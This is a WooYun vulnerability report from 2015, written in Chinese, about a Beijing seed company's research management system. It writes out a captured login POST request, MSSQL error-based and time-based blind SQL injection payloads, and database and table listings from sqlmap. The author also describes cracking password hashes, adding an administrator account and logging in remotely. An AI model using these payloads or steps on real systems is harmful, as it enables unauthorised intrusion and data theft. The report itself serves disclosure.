当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158261

漏洞标题:北京奥瑞金种业公司存在高危SQL注入/弱口令(已远程登入主机,可内网渗透)

相关厂商:北京奥瑞金种业股份有限公司

漏洞作者: ㄚ冷的祝福

提交时间:2015-12-05 05:32

修复时间:2016-01-23 17:56

公开时间:2016-01-23 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

北京奥瑞金种业股份有限公司,科研信息管理系统存在高危SQL注入+弱口令(已远程登入主机,可内网渗透)

详细说明:

**.**.**.**/Default.aspx



无意间逛到,看到输入栏就先给他一个单引号瞧瞧,结果出错啦,这下不打不行。


注入点在txt_username

POST /Default.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=vropc5nguuukihe5okukt145
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMzU4ODAxNTM1ZGQwARHzAB%2FhEiHrBwMkWdgKlyBdnA%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBAKZ4qjZDQK3u5vhBALy7cL8AgKM54rGBqyW1EDXsoog9U7coTHVz7kTZHhW&txt_username=test&txt_password=aa&Button1=%E7%99%BB%E5%BD%95


基本上没什么阻挡,那就直接上SQLMap吧,只有找出error-based跟AND/OR time-based blind。

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txt_username (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJMzU4ODAxNTM1ZGQwARHzAB/hEiHrBwMkWdgKlyBdnA==&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKZ4qjZDQK3u5vhBALy7cL8AgKM54rGBqyW1EDXsoog9U7coTHVz7kTZHhW&txt_username=admin' AND 1891=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1891=1891) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'smgw'='smgw&txt_password=aaa&Button1=%E7%99%BB%E5%BD%95
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJMzU4ODAxNTM1ZGQwARHzAB/hEiHrBwMkWdgKlyBdnA==&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKZ4qjZDQK3u5vhBALy7cL8AgKM54rGBqyW1EDXsoog9U7coTHVz7kTZHhW&txt_username=admin' OR 5269=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'JWRK'='JWRK&txt_password=aaa&Button1=%E7%99%BB%E5%BD%95
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] master
[*] model
[*] msdb
[*] ORIGINYANFA
[*] tempdb
[*] TORIGINYANFA
Database: TORIGINYANFA
[12 tables]
+-----------------+
| TGBreedL |
| TGCHECKL |
| TGFIELDL |
| TGLISTL |
| TGPCL |
| TGPROJECTM |
| TGSSRL |
| TGSelfL |
| TGT0L |
| TGTABLE |
| TGTESTL |
| TGZTL |
+-----------------+
Database: ORIGINYANFA
[55 tables]
+-----------------+
| Analyze |
| AnalyzeImage |
| AppTotal |
| AppTsum |
| Application |
| BCTestL |
| BSTestL |
| BaseBreedC |
| BaseBreedL |
| BaseBreedT |
| BaseGroupL |
| Blog |
| BreedChange |
| BreedInfo |
| BreedInfoTmp |
| CTestL |
| CTestplan |
| CrossL |
| DTestL |
| DerivationLF |
| Detail |
| Dictionary |
| Dictionary2 |
| DuizhaoL |
| EC |
| FST |
| FSTestL |
| FSTesterL |
| Farming |
| GroupL |
| HPTestL |
| ISelfL |
| MA |
| MAP |
| NJTestL |
| PRTestL |
| Promission |
| RTestL |
| Result |
| SeedDetail |
| SeedOutL |
| SeedResourceL |
| SelfingImageL |
| SelfingL |
| SiteEnvironment |
| SiteInfo |
| Systemrizhi |
| TCTestL |
| TestBreedL |
| TestInfo |
| UserInfo |
| UserPromission |
| Vi_TestResult |
| WaiyinL |
| Weather |
+-----------------+


捞下系统用户密码表


密码字段是MD5 hash,搜寻下其中有几个弱密码,直接登进系统瞧瞧

看到这些密密麻麻的农作实验数据,为研究人员致上敬意
再来修改下SQLMap配置,让它侦测出stacked queries,就能玩更好玩的,
新增一个tthhcc/8i!kmnju76使用者,并添加到管理群组(测试完成已自行移除账号)。


接着远程进去



到这吧…不测了 这个网段上有个10多台Server,其中还有阿哥汇、士惠农业主机!!!

漏洞证明:


修复方案:

过滤
让防火墙起点作用
不要使用高权限数据库账号

版权声明:转载请注明来源 ㄚ冷的祝福@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-09 18:05

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无